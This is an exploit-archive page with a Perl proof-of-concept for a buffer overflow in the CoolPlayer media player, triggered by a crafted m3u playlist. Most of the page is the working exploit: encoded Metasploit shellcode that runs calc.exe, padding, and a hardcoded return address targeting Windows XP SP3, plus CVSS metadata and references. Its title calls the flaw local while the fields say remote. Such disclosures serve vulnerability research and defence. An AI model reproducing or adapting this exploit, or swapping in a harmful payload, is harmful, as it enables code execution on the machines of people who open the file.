CoolPlayer m3u File Local Buffer Overflow Exploit

2008.08.02
Credit: k`sOSe
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # k`sOSe - 07/29/2008 use warnings; use strict; # http://www.metasploit.com # EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe # [*] x86/shikata_ga_nai succeeded, final size 169 my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" . "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" . "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" . "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" . "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" . "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" . "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" . "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" . "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" . "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" . "\x1e\x28\x44\xd4"; print $shellcode . "\x41" x (218 - length($shellcode)) . "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3

References:

http://www.securityfocus.com/bid/30418
http://www.milw0rm.com/exploits/6157


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top